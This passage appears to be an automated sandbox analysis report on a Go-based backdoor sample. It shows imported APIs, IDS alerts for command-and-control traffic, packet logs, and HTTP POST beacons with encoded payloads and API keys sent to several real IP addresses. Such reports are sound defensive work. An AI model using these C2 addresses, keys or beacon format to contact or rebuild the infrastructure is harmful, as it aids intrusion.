gdiplus.dll	GdipDeletePrivateFontCollection, GdipNewPrivateFontCollection, GdipDrawImageRectRectI, GdipDrawLine, GdipAddPathEllipseI, GdipGetPathGradientPointCount, GdipSetPathGradientSurroundColorsWithCount, GdipSetPathGradientCenterColor, GdipCreatePathGradientFromPath, GdipCreateFromHWND, GdipGetFontHeight, GdipCreatePen2, GdipDrawRectangleI, GdipCreateLineBrushFromRect, GdipAddPathRectangleI, GdipPrivateAddMemoryFont, GdipSetPenWidth, GdipDrawEllipseI, GdipSetPenDashOffset, GdipAddPathLineI, GdipSetPixelOffsetMode, GdipDrawImageRectI, GdipGetImageGraphicsContext, GdipGetImagePixelFormat, GdipDrawImagePointRectI, GdipResetWorldTransform, GdipCreateBitmapFromScan0, GdipDrawPath, GdipFillPath, GdipSetSmoothingMode, GdipGetSmoothingMode, GdipResetClip, GdipCreatePath, GdipFillRectangleI, GdipRotateWorldTransform, GdipGetPixelOffsetMode, GdipTranslateWorldTransform, GdipSetClipRectI, GdipSetTextRenderingHint, GdipCreateFont, GdipGetFontCollectionFamilyList, GdipCreateLineBrushFromRectI, GdipClosePathFigure, GdipAddPathArcI, GdipResetPath, GdipDrawString, GdipMeasureString, GdipSetStringFormatAlign, GdipSetStringFormatLineAlign, GdipDeleteStringFormat, GdipCreateStringFormat, GdipDeleteFont, GdipCreateFontFromLogfontA, GdipCreateFontFromDC, GdipDrawRectangle, GdipDrawLineI, GdipSetPenDashStyle, GdipDeletePen, GdipCreatePen1, GdipBitmapSetPixel, GdipBitmapGetPixel, GdipGetImageHeight, GdipGetImageWidth, GdipCreateBitmapFromFile, GdipCloneImage, GdipDisposeImage, GdipFillRectangle, GdipCloneBrush, GdipAlloc, GdipFree, GdipDeleteBrush, GdipCreateSolidFill, GdipDeleteGraphics, GdipCreateFromHDC, GdipCreateBitmapFromStream, GdipSetPathGradientGammaCorrection, GdipSetPathGradientCenterPoint, GdipAddPathLine2, GdipGetPathWorldBoundsI, GdipAddPathPie, GdipAddPathLine, GdipAddPathArc, GdipSaveImageToFile, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipSetInterpolationMode, GdipCloneFontFamily, GdipDeleteFontFamily, GdipDeletePath, GdipSetLinePresetBlend
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WININET.dll	InternetCloseHandle, HttpQueryInfoW, InternetSetOptionW, InternetReadFile, InternetOpenUrlW, DeleteUrlCacheEntryW, InternetOpenW
PSAPI.DLL	GetModuleFileNameExW
IMM32.dll	ImmDisableIME
RPCRT4.dll	NdrAsyncClientCall, RpcAsyncInitializeHandle, RpcStringBindingComposeW, RpcBindingFromStringBindingW, RpcAsyncCompleteCall, RpcStringFreeW, RpcBindingFree
OLEACC.dll	LresultFromObject, CreateStdAccessibleObject
WTSAPI32.dll	WTSQuerySessionInformationW
USERENV.dll	GetUserProfileDirectoryW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-27T18:44:47.970895+0100	2855539	ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2	1	88.218.60.50	13351	192.168.2.5	49990	TCP
2024-10-27T18:44:47.971083+0100	2855536	ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1	1	192.168.2.5	49990	88.218.60.50	13351	TCP
2024-10-27T18:45:17.207189+0100	2855537	ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2	1	192.168.2.5	49990	88.218.60.50	13351	TCP
2024-10-27T18:45:17.476954+0100	2855538	ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1	1	88.218.60.50	13351	192.168.2.5	49990	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 18:43:28.779100895 CET	49704	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:43:28.784559965 CET	80	49704	46.8.232.106	192.168.2.5
Oct 27, 2024 18:43:28.784660101 CET	49704	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:43:28.785554886 CET	49704	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:43:28.790940046 CET	80	49704	46.8.232.106	192.168.2.5
Oct 27, 2024 18:43:29.640947104 CET	80	49704	46.8.232.106	192.168.2.5
Oct 27, 2024 18:43:29.667650938 CET	49705	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:43:29.673171997 CET	80	49705	46.8.236.61	192.168.2.5
Oct 27, 2024 18:43:29.673269033 CET	49705	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:43:29.673568964 CET	49705	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:43:29.678891897 CET	80	49705	46.8.236.61	192.168.2.5
Oct 27, 2024 18:43:29.689800978 CET	49704	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:43:30.524574995 CET	80	49705	46.8.236.61	192.168.2.5
Oct 27, 2024 18:43:30.545744896 CET	49706	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:43:30.551175117 CET	80	49706	93.185.159.253	192.168.2.5
Oct 27, 2024 18:43:30.551369905 CET	49706	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:43:30.551726103 CET	49706	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:43:30.557010889 CET	80	49706	93.185.159.253	192.168.2.5
Oct 27, 2024 18:43:30.567641973 CET	49705	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:43:31.486916065 CET	80	49706	93.185.159.253	192.168.2.5
Oct 27, 2024 18:43:31.516092062 CET	49707	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:43:31.521764994 CET	80	49707	91.212.166.91	192.168.2.5
Oct 27, 2024 18:43:31.521879911 CET	49707	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:43:31.522293091 CET	49707	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:43:31.527766943 CET	80	49707	91.212.166.91	192.168.2.5
Oct 27, 2024 18:43:31.538125992 CET	49706	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:43:32.432786942 CET	80	49707	91.212.166.91	192.168.2.5
Oct 27, 2024 18:43:32.460508108 CET	49708	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:43:32.465960979 CET	80	49708	188.130.206.243	192.168.2.5
Oct 27, 2024 18:43:32.466031075 CET	49708	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:43:32.466320038 CET	49708	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:43:32.471587896 CET	80	49708	188.130.206.243	192.168.2.5
Oct 27, 2024 18:43:32.482289076 CET	49707	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:43:33.360384941 CET	80	49708	188.130.206.243	192.168.2.5
Oct 27, 2024 18:43:33.361246109 CET	49708	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:43:33.361288071 CET	49707	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:43:33.361335993 CET	49706	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:43:33.361361980 CET	49705	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:43:33.361366987 CET	49704	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:43:33.368380070 CET	80	49708	188.130.206.243	192.168.2.5
Oct 27, 2024 18:43:33.368484974 CET	49708	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:43:33.369055033 CET	80	49707	91.212.166.91	192.168.2.5
Oct 27, 2024 18:43:33.369086981 CET	80	49704	46.8.232.106	192.168.2.5
Oct 27, 2024 18:43:33.369128942 CET	49707	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:43:33.369178057 CET	49704	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:43:33.369201899 CET	80	49706	93.185.159.253	192.168.2.5
Oct 27, 2024 18:43:33.369234085 CET	80	49705	46.8.236.61	192.168.2.5
Oct 27, 2024 18:43:33.369263887 CET	49706	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:43:33.369293928 CET	49705	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:03.384758949 CET	49834	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:03.390258074 CET	80	49834	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:03.390350103 CET	49834	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:03.390639067 CET	49834	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:03.396043062 CET	80	49834	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:04.256853104 CET	80	49834	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:04.279139996 CET	49840	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:04.284435987 CET	80	49840	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:04.288090944 CET	49840	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:04.288491011 CET	49840	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:04.293776989 CET	80	49840	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:04.304393053 CET	49834	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:05.205177069 CET	80	49840	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:05.228306055 CET	49846	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:05.233823061 CET	80	49846	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:05.233891964 CET	49846	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:05.234146118 CET	49846	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:05.239602089 CET	80	49846	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:05.250133038 CET	49840	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:06.118067026 CET	80	49846	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:06.140642881 CET	49853	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:06.146039009 CET	80	49853	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:06.146145105 CET	49853	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:06.146424055 CET	49853	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:06.151770115 CET	80	49853	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:06.162532091 CET	49846	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:07.088943005 CET	80	49853	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:07.112241030 CET	49859	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:07.117748022 CET	80	49859	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:07.117837906 CET	49859	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:07.118112087 CET	49859	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:07.123370886 CET	80	49859	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:07.135237932 CET	49853	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:08.246736050 CET	80	49859	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:08.254419088 CET	49859	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:08.254498959 CET	49853	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:08.254518986 CET	49846	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:08.254525900 CET	49840	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:08.254553080 CET	49834	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:08.260833979 CET	80	49859	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:08.260916948 CET	49859	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:08.261528969 CET	80	49853	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:08.261539936 CET	80	49840	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:08.261550903 CET	80	49846	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:08.261590004 CET	49840	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:08.261610985 CET	49846	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:08.261635065 CET	49853	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:08.262360096 CET	80	49834	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:08.264076948 CET	49834	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:38.275919914 CET	49985	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:38.281459093 CET	80	49985	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:38.281548023 CET	49985	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:38.281869888 CET	49985	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:38.287245989 CET	80	49985	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:39.251559973 CET	80	49985	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:39.272465944 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:39.277861118 CET	80	49986	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:39.278070927 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:39.278316975 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:39.283657074 CET	80	49986	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:39.294348955 CET	49985	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:40.774508953 CET	80	49986	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:40.775250912 CET	80	49986	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:40.775382042 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:40.775999069 CET	80	49986	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:40.776088953 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:40.797466040 CET	49987	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:40.802954912 CET	80	49987	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:40.803047895 CET	49987	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:40.803282976 CET	49987	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:40.808984041 CET	80	49987	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:41.673378944 CET	80	49987	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:41.695683002 CET	49988	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:41.701083899 CET	80	49988	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:41.701314926 CET	49988	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:41.701571941 CET	49988	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:41.707745075 CET	80	49988	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:41.717629910 CET	49987	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:42.640877962 CET	80	49988	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:42.668994904 CET	49989	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:42.674355984 CET	80	49989	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:42.674504042 CET	49989	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:42.674789906 CET	49989	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:42.680140018 CET	80	49989	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:42.690761089 CET	49988	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:47.181979895 CET	80	49989	188.130.206.243	192.168.2.5
Oct 27, 2024 18:44:47.186742067 CET	49987	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:47.186742067 CET	49988	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:47.186744928 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:47.187016010 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:44:47.187017918 CET	49985	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:47.193830013 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:44:47.193908930 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:44:47.194111109 CET	80	49987	93.185.159.253	192.168.2.5
Oct 27, 2024 18:44:47.194159031 CET	49987	80	192.168.2.5	93.185.159.253
Oct 27, 2024 18:44:47.194979906 CET	80	49988	91.212.166.91	192.168.2.5
Oct 27, 2024 18:44:47.195028067 CET	80	49986	46.8.236.61	192.168.2.5
Oct 27, 2024 18:44:47.195029020 CET	49988	80	192.168.2.5	91.212.166.91
Oct 27, 2024 18:44:47.195039034 CET	80	49985	46.8.232.106	192.168.2.5
Oct 27, 2024 18:44:47.195082903 CET	49986	80	192.168.2.5	46.8.236.61
Oct 27, 2024 18:44:47.195090055 CET	49985	80	192.168.2.5	46.8.232.106
Oct 27, 2024 18:44:47.225922108 CET	49989	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:44:47.970895052 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:44:47.971082926 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:44:47.976506948 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:02.987279892 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:45:02.992738008 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:07.971535921 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:07.972040892 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:45:07.977396965 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:17.191468000 CET	49989	80	192.168.2.5	188.130.206.243
Oct 27, 2024 18:45:17.197103977 CET	80	49989	188.130.206.243	192.168.2.5
Oct 27, 2024 18:45:17.207189083 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:45:17.212732077 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:17.476953983 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:17.524652004 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:45:28.242366076 CET	13351	49990	88.218.60.50	192.168.2.5
Oct 27, 2024 18:45:28.242536068 CET	49990	13351	192.168.2.5	88.218.60.50
Oct 27, 2024 18:45:28.247857094 CET	13351	49990	88.218.60.50	192.168.2.5

HTTP Request Dependency Graph

46.8.232.106

46.8.236.61

93.185.159.253

91.212.166.91

188.130.206.243

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	46.8.232.106	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:43:28.785554886 CET	334	OUT	POST / HTTP/1.1 Host: 46.8.232.106 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: eN7waNgs Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:43:29.640947104 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:43:29 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	46.8.236.61	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:43:29.673568964 CET	333	OUT	POST / HTTP/1.1 Host: 46.8.236.61 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: XVTqMexo Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:43:30.524574995 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:43:30 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	93.185.159.253	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:43:30.551726103 CET	336	OUT	POST / HTTP/1.1 Host: 93.185.159.253 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: QaHULwvf Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:43:31.486916065 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:43:31 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49707	91.212.166.91	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:43:31.522293091 CET	335	OUT	POST / HTTP/1.1 Host: 91.212.166.91 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: bl6L4k8b Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:43:32.432786942 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:43:32 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49708	188.130.206.243	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
Oct 27, 2024 18:43:32.466320038 CET	337	OUT	POST / HTTP/1.1 Host: 188.130.206.243 User-Agent: Go-http-client/1.1 Content-Length: 198 X-Api-Key: MhKpIQdF Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: ML\K7XP0.[32),57=X,?!</7]Y!+WV]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K
Oct 27, 2024 18:43:33.360384941 CET	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Sun, 27 Oct 2024 17:43:33 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49834	46.8.232.106	80	3748	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Timestamp	Bytes transferred	Direction	Data
